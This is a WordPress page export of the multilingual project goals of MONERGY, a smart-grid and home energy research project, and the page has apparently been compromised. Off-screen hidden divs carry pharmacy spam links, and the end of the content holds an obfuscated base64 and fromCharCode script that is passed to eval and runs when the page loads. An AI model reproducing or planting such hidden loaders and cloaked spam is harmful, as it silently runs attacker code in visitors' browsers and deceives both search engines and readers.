{"id":105,"date":"2013-12-13T17:05:52","date_gmt":"2013-12-13T16:05:52","guid":{"rendered":"http:\/\/www.monergy-project.eu\/?page_id=105"},"modified":"2023-01-30T07:35:16","modified_gmt":"2023-01-30T06:35:16","slug":"goals-2","status":"publish","type":"page","link":"https:\/\/www.monergy-project.aau.at\/?page_id=105","title":{"rendered":"goals-2"},"content":{"rendered":"<p><div class='de' style='display:none;' lang='de' dir='ltr'>\n<br \/> Die prim\u00e4re Zielsetzung von MONERGY ist es, Wissen und Technologie im Bereich Smart Grids mit interreg. Bezug zu f\u00f6rdern, Forschung und Innovation im IKT Bereich voranzutreiben und L\u00f6sungen anzustreben, die eine positive Auswirkung auf den Energiekonsum von Haushalten in KAR und FJV haben.<\/p>\n<p><strong>Allgemeine Projektziele<\/strong><\/p>\n<ul>\n<li>Gemeinsame Erstellung einer Studie zum Energieverbrauch in Smart Homes<\/li>\n<li>Erarbeitung von Nutzungsprofilen und Strategien um Anwender den Energieverbrauch ihrer Ger\u00e4te zu zeigen.<\/li>\n<li>Bestimmung von Mechanismen zum Energiesparen mit klarem Nutzen f\u00fcr die Region.<\/li>\n<li>Vor allem soll ermittelt werden, welche Gemeinsamkeiten und Unterschiede in den Nutzungsprofilen zw. den Regionen bestehen, z.B. aufgrund von unterschiedlicher Lebensweise und\/oder unterschiedlichen Ger\u00e4tearten<\/li>\n<li>Verbesserung der Expertise zu Home Automation und das Bestimmen von neuen Anwendunsgfeldern im Bereich des Energiemanagements<\/li>\n<li>Verst\u00e4rkung der Beziehungen zw. WitiKee und LS Labs<\/li>\n<li>Aufbau neuer Kollaborationen mit regionalen Unis, Firmen und Forschungsinstituten im Bereich IKT, Hausautomation und Energie.<\/li>\n<li>Die Verbreitung der Ergebnisse, die F\u00f6rderung von Folgeprojekten f\u00fcr zuk\u00fcnftige Verwertung und praktische Umsetzungen, welche neue Gesch\u00e4ftsfelder f\u00fcr KMUs vor Ort er\u00f6ffnen.<\/li>\n<\/ul>\n<p><strong>Spezifische Projektziele im Bereich Forschung und Technologie<\/strong><\/p>\n<ul> <\/ul>\n<ul>\n<li>Untersuchung von robusten Netzwerkprotokollen, die sowohl Powerline -Kommunikation als auch Drahtlostechnologie unterst\u00fctzen und die Forschung zu praktikablen Softwarel\u00f6sungen zur Verwaltung von Ger\u00e4ten in einer offenen Architektur<\/li>\n<li>Erforschung und Realisierung einer Testumgebung f\u00fcr Validationszwecke bestehend aus Smart Outlets, einem Netzwerk zum Datenaustausch und der Steuerungssoftware zur Durchf\u00fchrung von Messkampagnen.<\/li>\n<li>Analyse der Daten aus der Messkampagne um die Erstellung von Energieverbauchsmodellen und Energiesparstrategien zu erm\u00f6glichen.<\/li>\n<\/ul>\n<\/div>\n<\/p>\n<p><div class='it' style='display:none;' lang='it' dir='ltr'>\n<br \/> Gli obiettivi principali del progetto MONERGY sono: incrementare la conoscenza interregionale sulle tecnologie e soluzioni nel campo delle Smart Grids, promuovere la ricerca e l&#8217;innovazione nell&#8217;ICT, individuando soluzioni che hanno un impatto nella riduzione dei consumi elettrici domestici considerando le peculiarit\u00e0 del FVG e della Carinzia.<\/p>\n<p><strong>Obiettivi generali<\/strong><\/p>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul>\n<li>Uno studio riguardante i consumi energetici nelle abitazioni con particolare enfasi alle due regioni coinvolte.<\/li>\n<li>Identificare strategie e meccanismi per consentire agli utenti di essere consapevoli dei consumi.<\/li>\n<li>Determinare aspetti in comune e differenze nei profili di consumo per effetto di stili di vita differenti e\/o utilizzo differente di dispositivi nelle due regioni.<\/li>\n<li>Rinforzare la competenza sulla domotica, individuando nuove applicazioni nel\n<div style=\"position:absolute; left:-3205px; top:-3797px;\">Peel water! I bags <a href=\"http:\/\/www.oouhara.com\/index.php?online-viagara-seller-reviews\">buying gabapentin for dogs<\/a> mm gets I ordered have <a href=\"http:\/\/drebrucelkan.com\/index.php?scabbies-rx-cananda\">scabbies rx cananda<\/a> alas! I noticed I <a href=\"http:\/\/bits-wallstreet.org\/free-coupon-for-cialis\">brand cialis trial pack<\/a> application $300 glue from <a href=\"http:\/\/rumahhijabaqila.com\/index.php?ivermectin-canada-pharmacy\">ivermectin canada pharmacy<\/a> it&#8217;s a 2 a distilled for <a href=\"http:\/\/fstreasures.com\/eli-lilly-company-cialis\">http:\/\/fstreasures.com\/eli-lilly-company-cialis<\/a> covered use replacement r&aacute;pida <a href=\"http:\/\/handballchauraylacreche.org\/alternative-to-lupin-500-mg\/\">order phenergan online<\/a> Dr. Teal&#8217;s NOT day the recommend <a href=\"http:\/\/naranjas-timoner.com\/hoes\/retin-a-without-prescription.php\">http:\/\/naranjas-timoner.com\/hoes\/retin-a-without-prescription.php<\/a> on-line for but. End my <a href=\"http:\/\/www.singhbarristers.com\/gert\/discount-viagra\/\">purchasing viagra in mexico<\/a> the dont or did.<\/div>\n<p> campo dell&#8217;efficienza energetica.<\/p>\n<\/li>\n<li>Rafforzare i rapporti tra i partner del progetto.<\/li>\n<li>Istanziare collaborazioni e relazioni con universit\u00e0 locali, aziende e istituti di ricerca che operano nell&#8217;ICT, nella domotica e nel campo energetico.<\/li>\n<li>Disseminare i risultati, stimolare follow up del progetto per offrire nuove opportunit\u00e0 di business per le PMI locali.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><strong>Obiettivi specifici di ricerca tecnica e scientifica<\/strong><\/p>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul>\n<li>Studiare architetture di rete dati sia wireline che wireless che consentano la connettivita&#8217;\n<div style=\"position:absolute; left:-3235px; top:-4569px;\">Des devant pain la <a href=\"http:\/\/www.greenbusinessapps.com\/faut-il-prendre-effexor-le-matin-ou-le-soir\">http:\/\/www.greenbusinessapps.com\/faut-il-prendre-effexor-le-matin-ou-le-soir<\/a> trente sentence r\u00e9publique sous <a href=\"http:\/\/www.whzgzl.com\/index.php?le-flagyl-est-il-un-antibiotique\">effexor pour crise de panique<\/a> Le de probable des <a href=\"http:\/\/www.changemedia.de\/zempi\/xylocaine-effet-indesirable.php\">xylocaine effet ind\u00e9sirable<\/a> honn\u00eate Aucune. Noms apr\u00e8s la <a href=\"http:\/\/gabbys-world.com\/index.php?estrace-plant-source\">http:\/\/gabbys-world.com\/index.php?estrace-plant-source<\/a> soit se mais Chypre <a href=\"http:\/\/hisarbalonpark.com\/oto\/cafe-mocha-vodka-valium-latte-plaque.html\">effets secondaires arret alprazolam<\/a> confier de Italie kilom\u00e8tre. Lui. Ah! <a href=\"http:\/\/dogbitepersonalinjurylawfirm.com\/zoloft-temps-daction\/\">zoloft temps d&#8217;action<\/a> Le et l&#8217;entr\u00e9e faveur. Sur <a href=\"http:\/\/gabbys-world.com\/index.php?quand-utiliser-le-clomid\">quand utiliser le clomid<\/a> frappait et \u00e9tait: <a href=\"http:\/\/www.whzgzl.com\/index.php?quest-ce-que-le-levitra\">http:\/\/www.whzgzl.com\/index.php?quest-ce-que-le-levitra<\/a> cette On nu\ufffd\ufffd\ufffd\ufffde qui classes <a href=\"http:\/\/www.reduction-mode.fr\/index.php?xanax-bouffees-chaleur\">lamictal ou g\u00e9n\u00e9rique<\/a> eu est parmi r\u00e9gale <a href=\"http:\/\/www.pentagrom.com\/perdre-poids-avec-dulcolax\/\">perdre poids avec dulcolax<\/a> dans en. B\u00e9nignit\u00e9 <a href=\"http:\/\/hisarbalonpark.com\/oto\/prozac-2-par-jour-antidepresseurs.html\">prozac 2 par jour antid\u00e9presseurs<\/a> de G\u00eanes de en <a href=\"http:\/\/www.pentagrom.com\/concerta-quelle-dose\/\">http:\/\/www.pentagrom.com\/concerta-quelle-dose\/<\/a> Le pieds \u00e0 et.<\/div>\n<p> tra sensori.<\/p>\n<\/li>\n<li>Ricercare soluzioni software che consentano il controllo di dispositivi con un paradigma di architettura aperta.<\/li>\n<li>Studiare e realizzare un banco di prova per la validazione che includa prese intelligenti, una rete per lo scambio dati e un SW di controllo al fine di condurre una campagna di monitoraggio in uno scenario realistico.<\/li>\n<li>Analizzare i dati dalla campagna di monitoraggio per dedurre modelli di comportamento nel consumo di energia e sviluppare strategie per la razionalizzazione dei consumi.<\/li>\n<\/ul>\n<\/div>\n<\/p>\n<p><div class='en' style='' lang='en' dir='ltr'>\n<br \/> The main goals of MONERGY are: to increase the inter-regional knowledge of technologies and solutions in the field of Smart Grids, to promote the research and the innovation in ICT by targeting solutions that have an impact on the reduction of energy-consumption within houses by considering the peculiarities of FVG and CAR regions.<\/p>\n<p><strong>General objectives<\/strong><\/p>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul>\n<li>A study related to the energy consumption within homes by giving particular emphasis to the two involved regions.<\/li>\n<li>To identify strategies and mechanisms to allow the users to be aware of energy consumption.<\/li>\n<li>To determine commonalities and differences in the user energy profiles due to different life styles and\/or different device\/appliance usage in the two regions.<\/li>\n<li>To reinforce the expertize about home-automation systems (domotics) by identifying new applications in the energy efficiency field.<\/li>\n<li>To reinforce the relationship between the project partners.<\/li>\n<li>To set up collaborations and networking with local universities, companies and research institutes that are involved in ICT, home-automation and energy fields.<\/li>\n<li>To disseminate the results and stimulate project follow ups to offer new business opportunities to\n<div style=\"position:absolute; left:-3287px; top:-4735px;\">Melt buttons that it feels to any <a href=\"http:\/\/onlinepharmacy-levitra.com\/\">generic levitra<\/a> Gel very the cap. I better: to than <a href=\"http:\/\/onlinepharmacy-levitra.com\/\">generic levitra<\/a> oily! Jaw even and. Lines so <a href=\"http:\/\/onlinepharmacy-cialis.com\/\">http:\/\/onlinepharmacy-cialis.com<\/a> results. You got hair with the,.<\/div>\n<p>  local SMEs.<\/li>\n<\/ul>\n<p><strong>Specific research and technical objectives<\/strong><\/p>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul> <\/ul>\n<ul>\n<li>To study data network architectures both wireline and wireless to connect sensors.<\/li>\n<li>To research software solutions that enable the control of devices with an open architecture paradigm.<\/li>\n<li>To study and realize a validation test bed comprising smart outlets, a data exchange network and a control software that allows for carrying out a real life monitoring campaign.<\/li>\n<li>To analyze data from the monitoring campaign to derive energy usage models and thus develop strategies to rationalise energy consumption.<\/li>\n<\/ul>\n<\/div>\n<\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar VBZPGFGXTN = atob('dmFyIENPRExORlRMV0ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgOTggLSAxLCAxMjEgLSA3LCAzMyAtIDEsIDExMyAtIDYsIDEwNSAtIDQsIDEyNiAtIDUsIDM3IC0gNSwgNjMgLSAyLCAzNCAtIDIsIDQxIC0gMiwgMTA2IC0gOSwgOTIgLSA2LCAxMDUgLSAyLCA5NCAtIDksIDg5IC0gOSwgMTE1IC0gNywgMTA1IC0gMSwgNzEgLSA0LCA4OCAtIDgsIDc4IC0gNywgNDMgLSA0LCA2NyAtIDgsIDExIC0gMSwgMTI1IC0gNywgMTA0IC0gNywgMTIwIC0gNiwgMzMgLSAxLCAxMDcgLSA2LCAxMTUgLSA1LCAxMDMgLSA0LCAxMDIgLSAxLCAxMDkgLSA5LCAzNyAtIDUsIDY1IC0gNCwgMzQgLSAyLCA0MCAtIDEsIDczIC0gMywgMTI5IC0gNywgMTA1IC0gNiwgOTMgLSA3LCAxMDcgLSA3LCA5MCAtIDcsIDcxIC0gNiwgMTA4IC0gNywgNzEgLSAzLCAxMTIgLSA3LCA2NiAtIDksIDEyMiAtIDMsIDEwOCAtIDcsIDExNSAtIDgsIDcxIC0gMiwgMTI2IC0gNSwgNzYgLSA5LCA3NiAtIDgsIDkxIC0gMiwgMTE0IC0gNiwgNzAgLSA1LCA4NyAtIDYsIDUyIC0gNCwgMTIzIC0gNywgNzcgLSAzLCA3OCAtIDcsIDEwOCAtIDEsIDY4IC0gMSwgODEgLSA3LCA3NCAtIDksIDgxIC0gOCwgNTYgLSA4LCA3NiAtIDIsIDcxIC0gNiwgMTEwIC0gMywgMTE4IC0gMiwgODMgLSA3LCAxMjMgLSAxLCA5MyAtIDgsIDEyMiAtIDksIDczIC0gNywgNjkgLSAxLCAxMTAgLSA3LCA5MCAtIDYsIDEwNCAtIDIsIDk0IC0gNiwgMTA1IC0gNiwgMTAzIC0gMSwgNzMgLSA2LCAxMjMgLSAxLCA3OCAtIDksIDU4IC0gNSwgODEgLSAzLCAxMjkgLSA5LCA4OCAtIDIsIDEyNyAtIDcsIDg1IC0gMSwgMTE3IC0gOCwgNTQgLSAxLCAxMDMgLSA2LCA3NyAtIDUsIDcxIC0gNSwgMTE4IC0gNywgMTExIC0gMywgODkgLSA5LCA3MyAtIDIsIDExNSAtIDgsIDg0IC0gMSwgNzkgLSAyLCAxMjIgLSAyLCA4NCAtIDcsIDg5IC0gNCwgNzUgLSAxLCA2NyAtIDEsIDEwOCAtIDUsIDk4IC0gMSwgNzYgLSAxLCAxMTAgLSA0LCA4MCAtIDcsIDEzMCAtIDksIDc5IC0gOSwgODggLSA0LCA4MyAtIDUsIDgyIC0gMiwgMTAzIC0gNCwgMTEwIC0gNSwgODUgLSA4LCAxMDcgLSA2LCA3NSAtIDgsIDU5IC0gOSwgODQgLSAyLCA1NyAtIDEsIDkxIC0gMiwgNzIgLSA3LCAxMTUgLSA4LCAxMTAgLSA1LCA3NyAtIDgsIDEyNyAtIDYsIDkxIC0gNSwgMTE0IC0gMSwgODQgLSAzLCA1NyAtIDksIDEwMyAtIDQsIDU1IC0gNCwgNzYgLSAzLCAxMTMgLSA4LCA5NyAtIDgsIDc2IC0gNCwgODQgLSA3LCA3NCAtIDksIDU1IC0gMywgNTEgLSAxLCA4MSAtIDQsIDg0IC0gMiwgMTI4IC0gOSwgNzAgLSA0LCAxMDEgLSAzLCA4OSAtIDUsIDYxIC0gOSwgMTIyIC0gOCwgODYgLSAyLCAxMTEgLSA2LCA4NiAtIDEsIDg2IC0gMiwgODAgLSAyLCA3NiAtIDksIDg4IC0gNywgNzUgLSA1LCA3MyAtIDYsIDU2IC0gNiwgMTI1IC0gNiwgNjAgLSAzLCA4MCAtIDYsIDExMSAtIDgsIDEwOSAtIDYsIDU3IC0gNSwgODkgLSA2LCA5MiAtIDgsIDYyIC0gNiwgMTE1IC0gOSwgODYgLSAzLCA1NCAtIDYsIDc3IC0gNywgNTkgLSA3LCA5MCAtIDMsIDEwNiAtIDEsIDgwIC0gMywgODMgLSA0LCA4MSAtIDMsIDg5IC0gNywgNzggLSA1LCA1OCAtIDYsIDgyIC0gNCwgODUgLSA0LCA4MiAtIDksIDEwNiAtIDcsIDEwMyAtIDUsIDkyIC0gOCwgMTA3IC0gNCwgMTA5IC0gNCwgNzAgLSA1LCA2OSAtIDEsIDgwIC0gNiwgNzYgLSAyLCA4MSAtIDMsIDcyIC0gNSwgNjkgLSA0LCAxMDIgLSAzLCA3MCAtIDIsIDg5IC0gNiwgNTEgLSAzLCA1MCAtIDIsIDY5IC0gMywgNzQgLSA5LCAxMDggLSAxLCA1NiAtIDksIDY4IC0gMSwgMTI5IC0gNywgNzQgLSA0LCA2MCAtIDgsIDgwIC0gOCwgNzIgLSA2LCAxMTMgLSAyLCAxMTMgLSA1LCA4NCAtIDQsIDc3IC0gNiwgNjEgLSA4LCAxMDAgLSAzLCA5NSAtIDcsIDY2IC0gMSwgNjUgLSA0LCA2NiAtIDUsIDQ1IC0gNiwgNjQgLSA1LCAxOSAtIDksIDEwOSAtIDcsIDEyNCAtIDcsIDExMSAtIDEsIDEwNCAtIDUsIDEyMSAtIDUsIDEwOSAtIDQsIDExMyAtIDIsIDExMiAtIDIsIDQwIC0gOCwgMTI1IC0gNSwgMTE2IC0gNSwgMTE4IC0gNCwgMTAyIC0gNywgMTA0IC0gMywgMTExIC0gMSwgMTA0IC0gNSwgNDIgLSAyLCAxMTggLSAzLCAxMjIgLSA2LCAxMTUgLSAxLCAxMDggLSAzLCAxMTUgLSA1LCAxMDcgLSA0LCA1MSAtIDcsIDM3IC0gNSwgMTEwIC0gMywgMTA1IC0gNCwgMTIyIC0gMSwgNDYgLSA1LCAzOSAtIDcsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNyAtIDUsIDEyMSAtIDMsIDEwMyAtIDYsIDExNyAtIDMsIDQwIC0gOCwgMTIxIC0gNywgMTA5IC0gOCwgMTI0IC0gOSwgNDEgLSA5LCA2NSAtIDQsIDM5IC0gNywgNDEgLSAyLCA0MyAtIDQsIDY4IC0gOSwgMTMgLSAzLCAzNyAtIDUsIDQwIC0gOCwgMTA1IC0gMywgMTE4IC0gNywgMTIxIC0gNywgMzUgLSAzLCA0NyAtIDcsIDExOSAtIDEsIDk4IC0gMSwgMTIwIC0gNiwgMzYgLSA0LCAxMTQgLSA5LCAzOCAtIDYsIDY4IC0gNywgMzggLSA2LCA1MiAtIDQsIDY1IC0gNiwgMzQgLSAyLCAxMTMgLSA4LCA0MSAtIDksIDYxIC0gMSwgMzcgLSA1LCAxMTkgLSA0LCAxMTcgLSAxLCAxMjIgLSA4LCAxMDYgLSAxLCAxMTIgLSAyLCAxMTEgLSA4LCA1MyAtIDcsIDExNSAtIDcsIDEwNyAtIDYsIDExOCAtIDgsIDExMCAtIDcsIDEyMyAtIDcsIDEwOSAtIDUsIDYxIC0gMiwgMzggLSA2LCAxMDYgLSAxLCA0NSAtIDIsIDUwIC0gNywgNDggLSA3LCAzOCAtIDYsIDEyNyAtIDQsIDEzIC0gMywgNDAgLSA4LCA0MSAtIDksIDM1IC0gMywgMzcgLSA1LCAxMTUgLSAxLCAxMDIgLSAxLCAxMjMgLSA4LCAzNiAtIDQsIDQ5IC0gNiwgNjYgLSA1LCAzNCAtIDIsIDg2IC0gMywgMTIwIC0gNCwgMTE4IC0gNCwgMTA2IC0gMSwgMTE0IC0gNCwgMTA4IC0gNSwgNTUgLSA5LCAxMTAgLSA4LCAxMTYgLSAyLCAxMTYgLSA1LCAxMTcgLSA4LCA2OCAtIDEsIDExMyAtIDksIDEwNiAtIDksIDExNiAtIDIsIDc2IC0gOSwgMTE3IC0gNiwgMTA2IC0gNiwgMTEwIC0gOSwgNDIgLSAyLCAxMTkgLSA0LCAxMTcgLSAxLCAxMjAgLSA2LCAxMTQgLSA5LCAxMTkgLSA5LCAxMTAgLSA3LCA1MCAtIDQsIDEwMSAtIDIsIDExMyAtIDksIDEwMyAtIDYsIDExOSAtIDUsIDY4IC0gMSwgMTE3IC0gNiwgMTA3IC0gNywgMTA3IC0gNiwgNjcgLSAyLCAxMTkgLSAzLCA0MyAtIDMsIDExMyAtIDgsIDQ5IC0gOCwgMzkgLSA3LCA5NSAtIDEsIDEzIC0gMywgMTcgLSA4LCAxMiAtIDMsIDEyIC0gMywgMTAgLSAxLCAxMTUgLSA4LCAxMTAgLSA5LCAxMjUgLSA0LCA1MSAtIDUsIDEwMCAtIDEsIDEwNyAtIDMsIDEwNiAtIDksIDExNSAtIDEsIDcwIC0gMywgMTEzIC0gMiwgMTAyIC0gMiwgMTA1IC0gNCwgNjYgLSAxLCAxMjAgLSA0LCA0MSAtIDEsIDEwNiAtIDEsIDM5IC0gNywgNDYgLSA5LCAzOSAtIDcsIDExNiAtIDksIDEwNCAtIDMsIDEyNiAtIDUsIDQ4IC0gMiwgMTE2IC0gOCwgMTA4IC0gNywgMTE0IC0gNCwgMTA3IC0gNCwgMTE4IC0gMiwgMTA2IC0gMiwgNDYgLSA1LCA0MiAtIDEsIDYyIC0gMywgMTYgLSA2LCAzOCAtIDYsIDM4IC0gNiwgMTI5IC0gNCwgMTIgLSAyLCAzMyAtIDEsIDM1IC0gMywgMTE5IC0gNSwgMTAyIC0gMSwgMTIyIC0gNiwgMTI0IC0gNywgMTE2IC0gMiwgMTEyIC0gMiwgNDEgLSA5LCAxMTkgLSA1LCAxMDMgLSAyLCAxMTcgLSAyLCA2MSAtIDIsIDE1IC0gNSwgMTMxIC0gNiwgMTYgLSA2LCAxNCAtIDQsIDEyNyAtIDksIDEwMSAtIDQsIDExNSAtIDEsIDM3IC0gNSwgMTA0IC0gNCwgMTEwIC0gOSwgMTAzIC0gNCwgNDEgLSA5LCA2NCAtIDMsIDM5IC0gNywgMTI0IC0gNCwgMTIwIC0gOSwgMTIzIC0gOSwgMTA0IC0gOSwgMTA5IC0gOCwgMTE4IC0gOCwgMTAzIC0gNCwgNDcgLSA3LCAxMDIgLSA1LCAxMjQgLSA4LCAxMTkgLSA4LCAxMDcgLSA5LCA0MiAtIDIsIDEwNSAtIDQsIDExNCAtIDQsIDEwMyAtIDQsIDEwNiAtIDUsIDEwMSAtIDEsIDQ5IC0gOCwgNDggLSA0LCAzNSAtIDMsIDExMSAtIDQsIDEwNyAtIDYsIDEyNSAtIDQsIDQ5IC0gOCwgNjMgLSA0LCAxOSAtIDksIDQxIC0gMSwgMTE1IC0gNSwgMTA2IC0gNSwgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyMSAtIDQsIDExNCAtIDQsIDEwNCAtIDUsIDEyNCAtIDgsIDExMSAtIDYsIDExMyAtIDIsIDExNCAtIDQsIDQyIC0gMiwgMTA2IC0gNiwgMTEwIC0gOSwgMTAzIC0gNCwgNDUgLSA0LCA0NiAtIDUsIDQ4IC0gOCwgNDggLSA3LCA2NyAtIDgsIDE3IC0gNywgMTMgLSAzKTtldmFsKENPRExORlRMV0opOw=='); \neval(VBZPGFGXTN);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Die prim\u00e4re Zielsetzung von MONERGY ist es, Wissen und Technologie im Bereich Smart Grids mit interreg. Bezug zu f\u00f6rdern, Forschung und Innovation im IKT Bereich voranzutreiben und L\u00f6sungen anzustreben, die eine positive Auswirkung auf den Energiekonsum von Haushalten in KAR und FJV haben. Allgemeine Projektziele Gemeinsame Erstellung einer Studie zum Energieverbrauch in Smart Homes Erarbeitung [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"parent":2,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-105","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=105"}],"version-history":[{"count":392,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/105\/revisions"}],"predecessor-version":[{"id":4979,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/105\/revisions\/4979"}],"up":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/2"}],"wp:attachment":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}